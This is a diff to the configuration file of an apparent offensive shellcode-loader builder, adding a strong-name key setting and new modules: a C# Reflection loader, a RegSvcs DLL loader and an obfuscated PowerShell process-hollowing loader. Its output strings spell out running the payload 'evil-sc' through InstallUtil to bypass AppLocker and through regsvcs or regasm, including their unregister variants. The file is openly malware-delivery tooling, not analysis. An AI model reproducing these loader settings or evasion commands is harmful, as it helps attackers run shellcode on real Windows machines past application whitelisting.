--- a/core/config/config.ini
+++ b/core/config/config.ini
@@ -32,6 +32,7 @@ cpp_template_file = ${loader_template}/template.cpp
 cs_template_file = ${loader_template}/template.cs
 pwsh_template_file = ${loader_template}/template.ps1
 vba_template_file = ${loader_template}/template.vba
+strong_name_key = ${loader_template}/key.snk
 
 [PLACEHOLDERS]
 shellcode = ####SHELLCODE####
@@ -56,6 +57,8 @@ class_name = ####CLASS_NAME####
 function_name = ####FUNCTION_NAME####
 entry_args = ####ENTRY_ARGS####
 shellcode_variable = encoded
+strong_name_required = //####STRONG_NAME_REQUIRED####
+
 
 ; the compiler_argument should not define .DLL compilation options (e.g /target:library)
 ; It's already defined using the output_format parameters
@@ -133,6 +136,18 @@ output_format = .exe
 compiler_args = -r:System.Configuration.Install
 custom_output = You may run this payload normaly: "evil-sc.exe" \nOr using installUtil to bypass AppLocker: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U evil-sc.exe"
 
+[windows_cs:Reflection]
+expected_format = DOTNET_BIN,DOTNET_DLL
+output_format = .exe
+
+[windows_cs:RegSvcsThread.dll]
+expected_format = RAW_BIN
+output_format = .dll
+compiler_args = -r:System.EnterpriseServices
+custom_output = Run the dll using one of following commands: \nC:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe evil-sc.dll\nC:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll\nOR We may executes UnRegisterClass If we don't have permissions\nC:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll\nC:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll
+
+
+
 [windows_js:VenomaToJs]
 expected_format = RAW_BIN
 output_format = .js
@@ -146,6 +161,10 @@ expected_format = RAW_BIN
 output_format = .ps1
 
 [windows_pwsh:PowerHollow]
+expected_format = RAW_BIN
+output_format = .ps1
+
+[windows_pwsh:PowerHollowObf]
 expected_format = RAW_BIN
 output_format = .ps1
 
